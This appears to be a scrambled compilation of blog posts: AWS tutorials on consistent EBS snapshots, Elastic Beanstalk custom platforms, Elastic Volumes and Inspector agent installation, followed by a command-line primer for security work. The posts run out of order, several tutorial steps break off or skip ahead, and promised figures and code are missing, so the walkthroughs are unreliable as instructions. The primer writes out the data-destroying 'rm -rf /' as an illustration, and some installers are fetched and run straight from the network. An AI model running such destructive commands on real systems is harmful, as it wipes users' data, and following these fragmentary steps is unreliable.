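As a rough sketch, and assuming a single C: volume with ebsSnapshot.cmd stored at its root, scriptVss.txt might contain DiskShadow commands along these lines:

SET CONTEXT PERSISTENT
ADD VOLUME C:
CREATE
EXEC C:\ebsSnapshot.cmd
DELETE SHADOWS ALL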

diskshadow.exe /s $VssScriptFileName
Exit $LastExitCode

Finally, it runs DiskShadow in script mode.

This PowerShell script is contained in a new SSM document and the maintenance window executes a command from this document every day at midnight on every Windows instance that has a tag “ConsistentSnapshot” equal to “WindowsVSS”.

Implementing and testing the example

First, use AWS CloudFormation to provision some of the required resources in your AWS account.

Open Create a Stack to create a CloudFormation stack from the template.

Choose Next.

Enter the ID of the latest AWS Windows Server 2016 Base AMI available in the current region (see Finding a Windows AMI) in pWindowsAmiId.

Follow the on-screen instructions.

CloudFormation creates the following resources:

A VPC with an Internet gateway attached.

A subnet on this VPC with a new route table, to enable access to the Internet and therefore to the AWS APIs.

An IAM role to grant an EC2 instance the required permissions.

A security group that allows RDP access from the Internet, as you need to log on to the instance later on.

A Windows instance in the subnet with the IAM role and the security group attached.

An SSM document containing the script described in the section above to create consistent EBS snapshots.

Another SSM document containing a script to restore logical volumes to a consistent state, as explained in the next section.

An IAM role to grant the maintenance window the required permissions.

After the stack creation completes, choose Outputs in the CloudFormation console and note the values returned:

IAM role for the maintenance window

Names of the two SSM documents

Then, manually create a maintenance window, if you have not already created it. For detailed instructions, see the “Example” section in the previous blog post.

After you create a maintenance window, assign a target where the task will run:

In the Maintenance Window list, choose the maintenance window that you just created.

You can view the history either in the History tab of the Maintenance Windows navigation pane of the Amazon EC2 console, as illustrated on the following figure, or in the Run Command navigation pane, with more details about each command executed.

Restoring logical volumes to a consistent state

DiskShadow―the VSS requester in this case―uses the Windows built-in VSS provider. To create a shadow copy, this built-in provider does not make a complete copy of the data. Instead, it keeps a copy of each block of data before a change overwrites it, in a dedicated storage area. The logical volume can be restored to its initial consistent state by combining the actual volume data with the initial data of the changed blocks.

The DiskShadow create command instructs the VSS service to proceed with the creation of shadow copies, including the release of I/O operations by the VSS writers after the shadow copies are created. Therefore, the EBS snapshots created by the next exec command may not be fully consistent.

Note: A workaround could be to build your own VSS provider in charge of creating EBS snapshots. Doing so would enable the EBS snapshots to be created before I/O operations are released. We will not develop this solution in this blog post.

Therefore, you need to “undo” any I/O operations that may have happened between the moment when the shadow copy was created and the moment when the EBS snapshots were created.

A solution consists of creating an EBS volume from the snapshot, attaching it to an intermediate Windows instance, and “reverting” the VSS shadow copy to restore the EBS volume to a consistent state. For the sake of simplicity, use the Windows instance that was backed up as the intermediate instance.

In Command document, select the name of the SSM document to restore snapshots returned by CloudFormation. For Target instances, select the Windows instance and choose Run.

Run Command executes the following PowerShell script on the Windows instance. It retrieves the list of offline disks—which corresponds in this case to the EBS volume that you just attached—and, for each offline disk, takes it online, reverts existing shadow copies, and takes it offline again.

The EBS volume is now in a consistent state and can be detached from the intermediate instance.

Conclusion

In this series of blog posts, I showed how you can use Amazon EC2 Systems Manager to create consistent EBS snapshots on a daily basis, with two practical examples for Linux and Windows. You can adapt this solution to your own requirements. For example, you may develop scripts for your own applications.

If an EC2 instance is up and running, there may be applications working, like databases, with data in memory or pending I/O operations that cannot be retrieved from an Amazon EBS snapshot. If your application is unable to recover from such a state, you might lose vital data for your business.

Amazon EBS provides block level storage volumes for use with EC2 instances. With EBS, you can create point-in-time snapshots of volumes, stored reliably on Amazon S3. If you rely on EBS snapshots as your backup solution and you cannot turn off the instance during backup, you can create consistent EBS snapshots, which involves informing the applications that they are about to be backed up so they can prepare.

In this post, the first of a two-part series, I show you how to use Run Command and Maintenance Window, two features of Amazon EC2 Systems Manager, to automate the execution of scripts on EC2 instances that create consistent EBS snapshots. First, I explain the approach. Then, I walk you through a practical example to create consistent snapshots of an Amazon Linux EC2 instance running MySQL.

Creating consistent EBS snapshots with Run Command

Run Command lets you securely and remotely manage the configuration of Windows or Linux instances. For example, you can run scripts―or commands―without having to log on locally to the instance. Run Command requires the SSM Agent to be installed on the EC2 instances.

I use Run Command to run a script remotely on EC2 instances. The script coordinates the preparation of applications and the creation of EBS snapshots, as follows:

It instructs the applications and the file system to flush their cached data to the disk and then to temporarily block all I/O operations. At this moment, the EBS volume is in a consistent state.

It queries the EC2 API to obtain the IDs of the EBS volumes attached to the instance and then creates a snapshot of each of these EBS volumes.

Finally, it thaws I/O operations as soon as the EC2 API responds to the last request with a snapshot ID. It is not necessary to wait for the snapshot to complete.

The content of the script varies upon the system and the applications that should be prepared for backup. See the example sections later in this post.

Instances communicate with the Run Command API to retrieve commands to execute and return results, and with the EC2 API to get volume attachment information and create EBS snapshots. To grant permission to call the APIs, I launch the instances with an IAM role for EC2 instances. This role is attached to the SSM managed policy AmazonEC2RoleforSSM and to an inline policy that allows the ec2:DescribeInstanceAttribute and ec2:CreateSnapshot actions.

Using Run Command has multiple benefits:

The scripts are maintained centrally and any changes are effective immediately on every instance

Commands are executed remotely and the instances continuously retrieve and run new commands

Status and results of each command execution are reported by Run Command and the information is also stored in AWS CloudTrail for audit purposes

Run Command is integrated with IAM to allow you to control both the users and level of access

Executing commands on a daily basis with Maintenance Windows

Maintenance Windows allows you to specify a recurring time window during which Run Command tasks are executed. I use Maintenance Windows to create consistent EBS snapshots on a daily basis during off-peak hours, because the process may temporarily increase resource utilization and affect application performance.

The maintenance window is registered with multiple targets. Each target is a set of EC2 instances that have a tag “ConsistentSnapshot” assigned and an arbitrary value depending on what script to execute. Each target is registered with a task assigned to an SSM document, which describes the actions to perform by Run Command to create consistent EBS snapshots on every instance of this target.

Understanding the example

I use Run Command to execute a shell script on the Amazon Linux instance:

mysql -u backup -h localhost -e 'FLUSH TABLES WITH READ LOCK;'

First, the shell script prepares MySQL for backup. The command FLUSH TABLES WITH READ LOCK waits for the active transactions to complete, flushes the cache to the filesystem, and prevents clients from making write operations (see FLUSH in the MySQL documentation). You should note that this MySQL backup method implies a short interruption of write operations, and the duration depends on the current size and workload. You should make sure that the backup does not affect your applications.
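A minimal sketch of such a script might look like the following; the instance metadata lookups and CLI calls are one possible way to wire it up, and the mysql client’s system command is used so that the snapshots start while the read lock is still held:

#!/bin/bash
# Sketch only: flush and lock MySQL, snapshot the attached EBS volumes, then unlock.
INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
REGION=$(curl -s http://169.254.169.254/latest/meta-data/placement/availability-zone | sed 's/.$//')

# Build one create-snapshot command per EBS volume attached to this instance.
SNAPSHOT_CMDS=""
for VOL in $(aws ec2 describe-instance-attribute --region "$REGION" \
    --instance-id "$INSTANCE_ID" --attribute blockDeviceMapping \
    --query 'BlockDeviceMappings[].Ebs.VolumeId' --output text); do
  SNAPSHOT_CMDS="$SNAPSHOT_CMDS aws ec2 create-snapshot --region $REGION --volume-id $VOL --description consistent-snapshot-$VOL;"
done

# The read lock is held for the duration of the mysql session; 'system' runs
# shell commands from inside that session, so the snapshots are initiated
# before the lock is released.
mysql -u backup -h localhost <<EOF
FLUSH TABLES WITH READ LOCK;
system sync
system $SNAPSHOT_CMDS
UNLOCK TABLES;
EOF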

This shell script is contained in a new SSM document. The maintenance window executes a command from this document every day at midnight on every Linux instance that has a tag “ConsistentSnapshot” equal to “AmazonLinuxMySQL”.

Implementing and testing the example

First, use AWS CloudFormation to provision some of the required resources in your AWS account.

Open Create a Stack to create a CloudFormation stack from the template.

Follow the on-screen instructions.

CloudFormation creates the following resources:

A VPC with an Internet gateway attached

A subnet on this VPC with a new route table to enable access to the Internet and therefore to the AWS APIs

An IAM role to grant an EC2 instance the required permissions

An Amazon Linux instance in the subnet with the IAM role attached and the user data script entered to install and configure MySQL and the SSM Agent at launch

An SSM document containing the script described in the earlier section.

An IAM role to grant the maintenance window the required permissions

After the stack creation completes, choose Outputs in the CloudFormation console and note the values that the process returned:

In the Maintenance Window list, select the maintenance window that you just created.

For Actions, choose Register tasks.

For Document, select the SSM document that was returned by CloudFormation.

Under the Target by section, select the target that you just created.

Under the Role section, select the IAM role that was returned by CloudFormation.

Under the Execute on section, for Targets, enter 1. For Stop after, enter 1 errors. You can adapt these numbers to your own needs.

Choose Register task.

You can view the history either in the History tab of the Maintenance Windows navigation pane of the Amazon EC2 console, as illustrated on the following figure, or in the Run Command navigation pane, with more details about each command executed.

Conclusion

In this post, I showed how you can use Amazon EC2 Systems Manager to create consistent EBS snapshots on a daily basis, with a practical example for MySQL running in an Amazon Linux instance.

In the next part of this two-part series, I walk you through another example to create consistent snapshots of a Windows Server instance with Microsoft VSS (Volume Shadow Copy Service).

There is excitement in the air! I am thrilled to announce that customers can now create custom platforms in AWS Elastic Beanstalk. With this latest release of the AWS Elastic Beanstalk service, developers and systems admins can now create and manage their own custom Elastic Beanstalk platform images allowing complete control over the instance configuration. As you know, AWS Elastic Beanstalk is a service for deploying and scaling web applications and services on common web platforms. With the service, you upload your code and it automatically handles the deployment, capacity provisioning, load balancing, and auto-scaling.

Previously, AWS Elastic Beanstalk provided a set of pre-configured platforms of multiple configurations using various programming languages, Docker containers, and/or web containers of each aforementioned type. Elastic Beanstalk would take the selected configuration and provision the software stack and resources needed to run the targeted application on one or more Amazon EC2 instances. With this latest release, there is now a choice to create a platform from your own customized Amazon Machine Image (AMI). The custom image can be built from one of the supported operating systems of Ubuntu, RHEL, or Amazon Linux. In order to simplify the creation of these specialized Elastic Beanstalk platforms, machine images are now created using the Packer tool. Packer is an open source tool that runs on all major operating systems, used for creating machine and container images for multiple platforms from a single configuration.

Custom platforms allow you to manage and enforce standardization and best practices across your Elastic Beanstalk environments. For example, you can now create your own platforms on Ubuntu or Red Hat Enterprise Linux and customize your instances with languages and frameworks not currently supported by Elastic Beanstalk, such as Rust or Sinatra.

Creating a Custom Platform

In order to create your custom platform, you start with a Packer template. After the Packer template is created, you create a platform definition file (platform.yaml), which defines the builder type for the platform, along with platform hooks and script files. With these files in hand, you create a zip archive file, called a platform definition archive, to package the files, associated scripts, and/or additional items needed to build your Amazon Machine Image (AMI). A sample of a basic folder structure for building a platform definition archive looks as follows:

|-- builder                 Contains files used by Packer to create the custom platform
|-- custom_platform.json    Packer template
|-- platform.yaml           Platform definition file
|-- ReadMe.txt              Describes the sample

The best way to take a deeper look into the new custom platform feature of Elastic Beanstalk is to put the feature to the test and build a custom AMI and platform using Packer. To start the journey, I am going to build a custom Packer template. I go to the Packer site, download the Packer tool, and ensure that the binary is in my environment path.

Now let’s build the template. The Packer template is the configuration file in JSON format, used to define the image we want to build. I will open up Visual Studio and use this as the IDE to create a new JSON file to build my Packer template.

The Packer template format has a set of keys designed for the configuration of various components of the image. The keys are:

variables (optional): one or more key/value strings defining user variables

builders (required): array that defines the builders used to create machine images and configuration of each

provisioners (optional): array defining provisioners to be used to install and configure software for the machine image

description (optional): string providing a description of template

min_packer_version (optional): string of minimum Packer version that is required to parse the template.

post-processors (optional): array defining post-processing steps to take once image build is completed

If you want a great example of the Packer template that can be used to create a custom image used for a custom Elastic Beanstalk platform, the Elastic Beanstalk documentation has samples of valid Packer templates for your review.

In the template, I will add a provisioner to run a build script to install Node with information about the script location and the command(s) needed to execute the script. My completed JSON file, tara-ebcustom-platform.json, looks as follows:
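The original file is not reproduced here; a rough sketch of such a template, with placeholder region, source AMI, and instance type, and provisioners that copy the builder folder and run the eb_builder.sh script described later, might look like this:

{
  "variables": {
    "platform_name": "tara-ebcustom-platform"
  },
  "builders": [
    {
      "type": "amazon-ebs",
      "region": "us-east-1",
      "source_ami": "ami-xxxxxxxx",
      "instance_type": "t2.micro",
      "ssh_username": "ec2-user",
      "ami_name": "{{user `platform_name`}}-{{timestamp}}"
    }
  ],
  "provisioners": [
    {
      "type": "file",
      "source": "builder",
      "destination": "/tmp/"
    },
    {
      "type": "shell",
      "scripts": ["builder/eb_builder.sh"]
    }
  ]
}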

Now that I have my template built, I will validate the template with Packer on the command line.
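The validation step is just the standard Packer command run against the template:

packer validate tara-ebcustom-platform.json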

What is cool is that my Packer template fails because, in the template, I specify a script, eb_builder.sh, that is located in a builder folder. However, I have not created the builder folder or the shell script noted in my Packer template. A little confused that I am happy that my file failed? I believe that this is great news because I can catch errors in my template and/or missing files needed to build my machine image before uploading it to the Elastic Beanstalk service. Now I will fix these errors by creating the folder and the file for the builder script.

Using the sample of the scripts provided in the Elastic Beanstalk documentation, I build my Dev folder with the structure noted above. Within the context of Elastic Beanstalk custom platform creation, the aforementioned scripts are platform hooks. Platform Hooks are run during lifecycle events and in response to management operations.

An example of the builder script used in my custom platform implementation is shown below:
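The original script is not reproduced here; a simplified sketch that installs Node.js (the NodeSource setup URL and version are assumptions used only for illustration) might look like this:

#!/bin/bash -xe
# Hypothetical eb_builder.sh: update the image and install Node.js.
yum -y update
curl --silent --location https://rpm.nodesource.com/setup_6.x | bash -
yum -y install nodejs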

My builder folder structure holds the platform hooks and other scripts referred to as platform scripts used to build the custom platform. Platform scripts are the shell scripts that you can use to get environment variables and other information in platform hooks. The platform hooks are located in a subfolder of my builder folder and follows the structure shown below:

All of these items (Packer template, platform.yaml, builder script, platform hooks, setup and config files, and platform scripts) make up the platform definition contained in my builder folder you see below.

I will leverage the platform.yaml provided in the sample .yaml file and change it as appropriate for my Elastic Beanstalk custom platform implementation. The result is the following completed platform.yaml file:
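The original file is not reproduced here; a minimal sketch that references the Packer template above might look like this:

version: "1.0"

provisioner:
  type: packer
  template: tara-ebcustom-platform.json
  flavor: amazon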

The template has now validated successfully, and my folder structure is completed.

All that is left for me is to create the platform using the EB CLI. This functionality is available with EB CLI version 3.10.0 or later. You can install the EB CLI by following the installation instructions in the Elastic Beanstalk developer guide.

To use the EB CLI to create a custom platform, I select the folder containing the files extracted from the platform definition archive. Within the context of that folder, I need to perform the following steps:

Use the EB CLI to initialize the platform repository and follow the prompts

eb platform init or ebp init

Launch the Packer environment with the template and scripts

eb platform create or ebp create

Validate an IAM role was successfully created for the instance. This instance profile role will be automatically created via the EB create process.

aws-elasticbeanstalk-custom-platform-ec2-role

Verify status of platform creation

eb platform status or ebp status

I will now go to the Command Line and use EB CLI command to initialize the platform by running the eb platform init command.

Next step is to create the custom platform using the EB CLI, so I’ll run the shortened command, ebp create, in my platform folder.

Success! A custom Elastic Beanstalk platform has been created, and we can deploy this platform for our web solution. It is important to remember that when you create a custom platform, you launch a single-instance environment without an EIP that runs Packer, and you can reuse this environment for multiple platforms, as well as multiple versions of each platform. Additionally, custom platforms are region-specific; therefore, you must create your platforms separately in each region if you use Elastic Beanstalk in multiple regions.

Deploying Custom Platforms

With the custom platform now created, you can deploy an application either via the AWS CLI or via the AWS Elastic Beanstalk Console. The ability to create an environment with an already created custom platform is only available for the new environment wizard.

You can select an already created custom platform on the Create a new environment web page by selecting the Custom Platform radio option under Platform. You would then select the custom platform you previously created from the list of available custom platforms.

Additionally, the EB CLI can be used to deploy the latest version of your custom platform. Using the command line to deploy the previously created custom platform would look as follows:

eb deploy -p tara-ebcustom-platform

Summary

You can get started building your own custom platforms for Elastic Beanstalk today. To learn more about Elastic Beanstalk or custom platforms, go to the AWS Elastic Beanstalk product page or the Elastic Beanstalk developer guide.

It is always interesting to speak with our customers and to learn how the dynamic nature of their business and their applications drives their block storage requirements. These needs change over time, creating the need to modify existing volumes to add capacity or to change performance characteristics. Today’s 24×7 operating models leave no room for downtime; as a result, customers want to make changes without going offline or otherwise impacting operations.

Over the years, we have introduced new EBS offerings that support an ever-widening set of use cases. For example, we introduced two new volume types in 2016 – Throughput Optimized HDD (st1) and Cold HDD (sc1). Our customers want to use these volume types as storage tiers, modifying the volume type to save money or to change the performance characteristics, without impacting operations.

In other words, our customers want their EBS volumes to be even more elastic!

New Elastic Volumes

Today we are launching a new EBS feature we call Elastic Volumes and making it available for all current-generation EBS volumes attached to current-generation EC2 instances. You can now increase volume size, adjust performance, or change the volume type while the volume is in use. You can continue to use your application while the change takes effect.

This new feature will greatly simplify (or even eliminate) many of your planning, tuning, and space management chores. Instead of a traditional provisioning cycle that can take weeks or months, you can make changes to your storage infrastructure instantaneously, with a simple API call.
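For example, a single CLI call along these lines changes the type, size, and IOPS of a volume in place (the volume ID is a placeholder), and a second call lets you track the modification:

aws ec2 modify-volume --volume-id vol-0123456789abcdef0 --volume-type io1 --size 400 --iops 20000
aws ec2 describe-volumes-modifications --volume-ids vol-0123456789abcdef0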

You can address the following scenarios (and many more that you can come up with on your own) using Elastic Volumes:

Changing Workloads – You set up your infrastructure in a rush and used the General Purpose SSD volumes for your block storage. After gaining some experience you figure out that the Throughput Optimized volumes are a better fit, and simply change the type of the volume.

Spiking Demand – You are running a relational database on a Provisioned IOPS volume that is set to handle a moderate amount of traffic during the month, with a 10x spike in traffic during the final three days of each month due to month-end processing. You can use Elastic Volumes to dial up the provisioning in order to handle the spike, and then dial it down afterward.

Increasing Storage – You provisioned a volume for 100 GiB and an alarm goes off indicating that it is now at 90% of capacity. You increase the size of the volume and expand the file system to match, with no downtime, and in a fully automated fashion.

To make a change from the Console, simply select the volume and choose Modify Volume from the Action menu:

Then make any desired changes to the volume type, size, and Provisioned IOPS (if appropriate). Here I am changing my 75 GiB General Purpose (gp2) volume into a 400 GiB Provisioned IOPS volume, with 20,000 IOPS:

When I click on Modify I confirm my intent, and click on Yes:

The volume’s state reflects the progress of the operation (modifying, optimizing, or complete):

The next step is to expand the file system so that it can take advantage of the additional storage space. To learn how to do that, read Expanding the Storage Space of an EBS Volume on Linux or Expanding the Storage Space of an EBS Volume on Windows. You can expand the file system as soon as the state transitions to optimizing (typically a few seconds after you start the operation). The new configuration is in effect at this point, although optimization may continue for up to 24 hours. Billing for the new configuration begins as soon as the state turns to optimizing (there’s no charge for the modification itself).
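On a Linux instance with an ext4 file system on the first partition, for example, the resize might look like the following (device names vary by instance and volume type):

sudo growpart /dev/xvda 1
sudo resize2fs /dev/xvda1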

Automatic Elastic Volume Operations

While manual changes are fine, there’s plenty of potential for automation. Here are a couple of ideas:

Right-Sizing – Use a CloudWatch alarm to watch for a volume that is running at or near its IOPS limit. Initiate a workflow and approval process that could provision additional IOPS or change the type of the volume. Or, publish a “free space” metric to CloudWatch and use a similar approval process to resize the volume and the filesystem.

Cost Reduction – Use metrics or schedules to reduce IOPS or to change the type of a volume. Last week I spoke with a security auditor at a university. He collects tens of gigabytes of log files from all over campus each day and retains them for 60 days. Most of the files are never read, and those that are can be scanned at a leisurely pace. They could address this use case by creating a fresh General Purpose volume each day, writing the logs to it at high speed, and then changing the type to Throughput Optimized.

As I mentioned earlier, you need to resize the file system in order to be able to access the newly provisioned space on the volume. In order to show you how to automate this process, my colleagues built a sample that makes use of CloudWatch Events, AWS Lambda, EC2 Systems Manager, and some PowerShell scripting. The rule matches the modifyVolume event emitted by EBS and invokes the logEvents Lambda function:

The function locates the volume, confirms that it is attached to an instance that is managed by EC2 Systems Manager, and then adds a “maintenance tag” to the instance:

Later (either manually or on a schedule), EC2 Systems Manager is used to run a PowerShell script on all of the instances that are tagged for maintenance. The script looks at the instance’s disks and partitions, and resizes all of the drives (filesystems) to the maximum allowable size. Here’s an excerpt:

This AWS Security Blog post continues in the same vein, describing how to use Amazon Inspector to automate various aspects of security management. In this post, I show you how to install the Amazon Inspector agent automatically through Amazon EC2 Systems Manager when a new Amazon EC2 instance is launched. In a subsequent post, I will show you how to automatically update EC2 instances that run Linux when Amazon Inspector discovers a missing security patch.

Amazon EC2 Systems Manager is a set of services that makes it easy to manage your Windows or Linux hosts running on EC2 instances. EC2 Systems Manager does this through an agent called EC2 Simple Systems Manager (SSM), which is installed on your instances. With SSM on your EC2 instances, you can save yourself an SSH or RDP session to the instance to perform management tasks.

With EC2 Systems Manager, you can perform various tasks at scale through a simple API, CLI, or EC2 Run Command. The EC2 Run Command can execute a Unix shell script on Linux instances or a Windows PowerShell script on Windows instances. When you use EC2 Systems Manager to run a script on an EC2 instance, the output is piped to a text file in Amazon S3 for you automatically. Therefore, you can examine the output without visiting the system or inventing your own mechanism for capturing console output.

The solution

Step 1: Enable EC2 Systems Manager and install the EC2 SSM agent

Setting up EC2 Systems Manager is relatively straightforward, but you must set up EC2 Systems Manager at the time you launch the instance. This is because the SSM agent will use an instance role to communicate with the EC2 Systems Manager securely. When launched with the appropriately configured IAM role, the EC2 instance is provided with a set of credentials that allows the SSM agent to perform actions on behalf of the account owner. The policy on the IAM role determines the permissions associated with these credentials.

The easiest way I have found to do this is to create the role, and then each time you launch an instance, associate the role with the instance and provide the SSM agent installation script in the instance’s user data in the launch wizard or API. Here’s how:

Create an instance role so that the on-instance SSM agent can communicate with EC2 Systems Manager. If you already need an instance role for some other purpose, use the IAM console to attach the AmazonEC2RoleforSSM managed policy to your existing role.

When launching the instance with the EC2 launch wizard, associate the role you just created with the new instance.

When launching the instance with the EC2 launch wizard, provide the appropriate script as user data for your operating system and architecture to install the SSM agent as the instance is launched. To see this process and scripts in full, see Installing the SSM Agent.

Note: You must change the scripts slightly when copying them from the instructions to the EC2 user data: the word region in the curl command must be replaced with the AWS region code (for example, us-east-1).

When your instance starts, the SSM agent is installed. Having the SSM agent on the instance is the key component to the automated installation of the Amazon Inspector agent on the instance.

Let’s assume that you will install the SSM agent when you first launch your instances. With that assumption in mind, you have two methods for installing the Amazon Inspector agent.

Method 1: Install the Amazon Inspector agent with user data

Just as we did above with the SSM agent, we can use the user data feature of EC2 to execute the Amazon Inspector agent installation script during instance launch. This is useful if you have decided not to install the SSM agent, but it is more work than necessary if you are in the habit of deploying the SSM agent at the launch of an instance.

To install the Amazon Inspector agent with user data on Linux systems, simply add the following commands to the User data box in the instance launch wizard (as shown in the following screenshot). This script works without modification on any Linux distribution that Amazon Inspector supports.
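At the time of writing, the documented agent installer can be fetched and run like this (verify the URL against the current Amazon Inspector documentation):

#!/bin/bash
cd /tmp
curl -O https://inspector-agent.amazonaws.com/linux/latest/install
sudo bash install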

Method 2: Install the Amazon Inspector agent with EC2 Systems Manager

In environments that launch new instances continually, installing the Amazon Inspector agent automatically when an instance starts saves you some additional work. As discussed in the previous method, you need to modify your instance launch process to include the EC2 SSM agent. This means you need to configure your instances with an EC2 Systems Manager role, as well as run the EC2 SSM agent.

First, create an IAM role that gives your Lambda function the permissions it needs to deploy the Amazon Inspector agent. Then, create the Lambda job that uses the SSM RunShellScript to install the Amazon Inspector agent. Finally, set up Amazon CloudWatch Events to run the Lambda job whenever a new instance enters the Running state.

Here are the details of the three-step process:

Step 1 – Create an IAM role for the Lambda function to use to send commands to EC2 Systems Manager:

Choose Specific state(s) and Running. This tells CloudWatch to generate an event when an instance enters the Running state.

Under Targets, choose Add target and then Lambda function.

Choose the function that you created in Step 2.

Click Configure details. Type a name and description for the event, and choose Create rule.
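For reference, the Run Command invocation that the Lambda function performs is roughly equivalent to the following CLI call (the instance ID is a placeholder, and the installer URL should be checked against the current documentation):

aws ssm send-command \
  --document-name "AWS-RunShellScript" \
  --instance-ids i-0123456789abcdef0 \
  --comment "Install the Amazon Inspector agent" \
  --parameters commands="cd /tmp && curl -O https://inspector-agent.amazonaws.com/linux/latest/install && sudo bash install"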

Summary

You have completed the setup! Now, whenever an EC2 instance enters the Running state (either on initial creation or on reboot), CloudWatch Events triggers an event that invokes the Lambda function that you created. The Lambda function then uses EC2 Systems Manager to install the Amazon Inspector agent on the instance.

In a subsequent AWS Security Blog post, I will show you how to take your security assessment automation a step further by automatically performing remediations for Amazon Inspector findings by using EC2 Systems Manager and Lambda.

If you have comments about this blog post, submit them in the “Comments” section below. If you have implementation questions, start a new thread on the Amazon Inspector forum.

On Twitter I made the mistake of asking people about command-line basics for cybersec professionals. I got a lot of useful responses, which I summarize in this long (5k words) post. It’s mostly driven by the tools I use, with a bit of input from the tweets I got in response to my query.

bash

By command-line this document really means bash.

There are many types of command-line shells. Windows has two, ‘cmd.exe’ and ‘PowerShell’. Unix started with the Bourne shell ‘sh’, and there have been many variations of this over the years, ‘csh’, ‘ksh’, ‘zsh’, ‘tcsh’, etc. When GNU rewrote Unix user-mode software independently, they called their shell “Bourne Again Shell” or “bash” (cue “JSON Bourne” shell jokes here).

Bash is the default shell for Linux and macOS. It’s also available on Windows, as part of their special “Windows Subsystem for Linux”. The Windows version of ‘bash’ has become my most used shell.

For Linux IoT devices, BusyBox is the most popular shell. It’s easy to learn, as it includes feature-reduced versions of popular commands.

man

‘Man’ is the command you should not run if you want help for a command.

Man pages are designed to drive away newbies. They are only useful if you are already mostly an expert with the command you desire help on. Man pages list all possible features of a program, but do not highlight examples of the most common features, or the most common way to use the commands.

Take ‘sed’ as an example. It’s used most commonly to do a search-and-replace in files, like so:

$ sed 's/rob/dave/' foo.txt

This usage is so common that many non-geeks know of it. Yet, if you type ‘man sed’ to figure out how to do a search and replace, you’ll get nearly incomprehensible gibberish, and no example of this most common usage.

I point this out because most guides on using the shell recommend ‘man’ pages to get help. This is wrong, it’ll just endlessly frustrate you. Instead, google the commands you need help on, or better yet, search StackExchange for answers.

You might try asking questions, like on Twitter or forum sites, but this requires a strategy. If you ask a basic question, self-important dickholes will respond by telling you to “rtfm” or “read the fucking manual”. A better strategy is to exploit their dickhole nature, such as saying “too bad command xxx cannot do yyy”. Helpful people will gladly explain why you are wrong, carefully explaining how xxx does yyy.

If you must use ‘man’, use the ‘apropos’ command to find the right man page. Sometimes multiple things in the system have the same or similar names, leading you to the wrong page.

apt-get install yum

Using the command-line means accessing that huge open-source ecosystem. Most of the things in this guide do not already exist on the system. You have to either compile them from source, or install via a package-manager. Linux distros ship with a small footprint, but have a massive database of precompiled software “packages” in the cloud somewhere. Use the “package manager” to install the software from the cloud.

On Debian and Ubuntu systems, that package manager is “apt-get”. On RedHat systems, use “yum” instead. On BSD, use the “ports” system, which you can also get working for macOS.

If no pre-compiled package exists for a program, then you’ll have to download the source code and compile it. There’s about an 80% chance this will be easy, following the instructions. There is a 20% chance you’ll experience “dependency hell”, for example, needing to install two mutually incompatible versions of Python.

Bash is a scripting language

Don’t forget that shells are really scripting languages. The bit that executes a single command is just a degenerate use of the scripting language. For example, you can do a traditional for loop like:

$ for i in $(seq 1 9); do echo $i; done

In this way, ‘bash’ is no different than any other scripting language, like Perl, Python, NodeJS, PHP CLI, etc. That’s why a lot of stuff on the system actually exists as short ‘bash’ programs, aka. shell scripts.

Few want to write bash scripts, but you are expected to be able to read them, either to tweak existing scripts on the system, or to read StackExchange help.

File system commands

The macOS “Finder” or Windows “File Explorer” are just graphical shells that help you find files, open, and save them. The first commands you learn are for the same functionality on the command-line: pwd, cd, ls, touch, rm, rmdir, mkdir, chmod, chown, find, ln, mount.

The command “rm -rf /” removes everything starting from the root directory. This will also follow mounted server directories, deleting files on the server. I point this out to give an appreciation of the raw power you have over the system from the command-line, and how easily you can disrupt things.

Of particular interest is the “mount” command. Desktop versions of Linux typically mount USB flash drives automatically, but on servers, you need to do it manually, e.g.:

$ mkdir ~/foobar
$ mount /dev/sdb ~/foobar

You’ll also use the ‘mount’ command to connect to file servers, using the “cifs” package if they are Windows file servers:
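For example, assuming a Windows file server named fileserver with a share named stuff (both placeholders), the mount might look like this:

$ sudo mount -t cifs //fileserver/stuff ~/foobar -o username=yourname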

The first thing hackers do when hacking into a system is run “uname” (to figure out what version of the OS is running) and “id” (to figure out which account they’ve acquired, like “root” or some other user).

The Linux system command I use most is “dmesg” (or ‘tail -f /var/log/dmesg’) which shows you the raw system messages. For example, when I plug in USB drives to a server, I look in ‘dmesg’ to find out which device was added so that I can mount it. I don’t know if this is the best way, it’s just the way I do it (servers don’t automount USB drives like desktops do).

Networking commands

The permanent state of the network (what gets configured on the next bootup) is configured in text files somewhere. But there are a wealth of commands you’ll use to view the current state of networking, make temporary changes, and diagnose problems.

The ‘ifconfig’ command has long been used to view the current TCP/IP configuration and make temporary changes. Learning how TCP/IP works means playing a lot with ‘ifconfig’. Use “ifconfig -a” for even more verbose information.

Use the “route” command to see if you are sending packets to the right router.

Use ‘arp’ command to make sure you can reach the local router.

Use ‘traceroute’ to make sure packets are following the correct route to their destination. You should learn the nifty trick it’s based on (TTLs). You should also play with the TCP, UDP, and ICMP options.

Use ‘ping’ to see if you can reach the target across the Internet. Usefully measures the latency in milliseconds, and congestion (via packet loss). For example, ping NetFlix throughout the day, and notice how the ping latency increases substantially during “prime time” viewing hours.

Use ‘dig’ to make sure DNS resolution is working right. (Some use ‘nslookup’ instead). Dig is useful because it’s the raw universal DNS tool – every time they add some new standard feature to DNS, they add that feature into ‘dig’ as well.

The ‘netstat -tualn’ command views the current TCP/IP connections and which ports are listening. I forget what the various options “tualn” mean, only that it’s the output I always want to see, rather than the raw “netstat” command by itself.

You’ll want to use ‘ethtool -k’ to turn off checksum and segmentation offloading. These are features that break packet-captures sometimes.

There is this newfangled ‘ip’ system for Linux networking, replacing many of the above commands, but as an old timer, I haven’t looked into that.

Some other tools for diagnosing local network issues are ‘tcpdump’, ‘nmap’, and ‘netcat’. These are described in more detail below.

ssh

In general, you’ll remotely log into a system in order to use the command-line. We use ‘ssh’ for that. It uses a protocol similar to SSL in order to encrypt the connection. There are two ways to use ‘ssh’ to login, with a password or with a client-side certificate.

When using SSH with a password, you type “ssh username@hostname”. The remote system will then prompt you for a password for that account.

When using client-side certificates, use “ssh-keygen” to generate a key, then either copy the public-key of the client to the server manually, or use “ssh-copy-id” to copy it using the password method above.

How this works is basic application of public-key cryptography. When logging in with a password, you get a copy of the server’s public-key the first time you login, and if it ever changes, you get a nasty warning that somebody may be attempting a man in the middle attack.

When using client-side certificates, the server trusts your public-key. This is similar to how client-side certificates work in SSL VPNs.

You can use SSH for things other than logging into a remote shell. You can script ‘ssh’ to run commands remotely on a system in a local shell script. You can use ‘scp’ (SSH copy) to transfer files to and from a remote system. You can do tricks with SSH to create tunnels, which is a popular way to bypass the restrictive rules of your local firewall nazi.

openssl

